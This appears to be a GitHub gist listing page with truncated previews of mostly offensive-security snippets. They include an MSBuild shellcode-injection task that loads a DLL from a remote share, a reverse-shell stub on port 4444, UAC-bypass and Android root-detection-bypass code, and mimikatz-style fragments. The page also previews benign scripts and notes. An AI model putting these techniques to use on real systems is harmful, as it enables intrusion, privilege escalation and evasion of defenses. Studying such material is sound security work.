unbaiat unbaiat

  • Unicorns United Ltd
  • Castalia
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode='<base64 encoded x64 shellcode>'
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
</Target>
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>
#!/bin/bash
# This is not great...
#
NAME=Shell
TAC=TrustAllCertificates
LHOST=10.0.0.254
LPORT=4444
COMMAND='"powershell"'
CURDIR=$(pwd)
#define NCRYPT_VIRTUAL_ISO_MAYBE 0x10000
#define NCRYPT_VIRTUAL_ISO 0x20000
#define NCRYPT_PER_BOOT_KEY 0x40000
NTSTATUS kuhl_m_standard_test(int argc, wchar_t * argv[])
{
SECURITY_STATUS status;
NCRYPT_PROV_HANDLE hCngProv = 0;
NCRYPT_KEY_HANDLE hCngKey = 0;
DWORD keyLen = 2048;
#Author :LiteSpeedtech
#date :20191023
#version :1.7.3
#Require :Prepare site map XML
# Allow LSCache crawler
#=======================================================
AGENTDESKTOP='User-Agent: lscache_runner'
AGENTMOBILE='User-Agent: lscache_runner iPhone'
SVALUE="0.1"
@unbaiat
unbaiat / akagi_58a.c
Created October 24, 2019 13:43 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@xpn
xpn / tasks.cs
Created August 19, 2019 13:56
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX, but not posting that publicly
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
@robbmanes
robbmanes / watch-unix-socket.stp
Last active October 17, 2024 07:43
Systemtap script to watch UNIX socket input
/*
* watch_unix_socket.stp
*
* This is simply a more modern version of the script found here:
* https://sourceware.org/systemtap/wiki/WSunixSockets
*
* The first argument is the location of the file descriptor for a UNIX socket.
* To find this address, for example, for the Docker socket run:
*
* # lsof 2>&1 | awk '/docker.sock/ {print $7}' | grep -v '0t0' | sort -u
@pich4ya
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto ([email protected]):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@chansdad
chansdad / rpi.md
Created June 12, 2019 07:21 — forked from jimyang2008/rpi.md
Raspberry Pi

Notes on Raspberry Pi

Initial default username password for Raspbian

username: pi
password: raspberry

Update Locale to support "US"

Need to add US support in addition to default GB, including language, keyboard, etc.

$ raspi-config

{
"mode": "patterns",
"proxySettings": [
{
"address": "127.0.0.1",
"port": 8080,
"username": "",
"password": "",
"type": 1,
"title": "127.0.0.1:8080",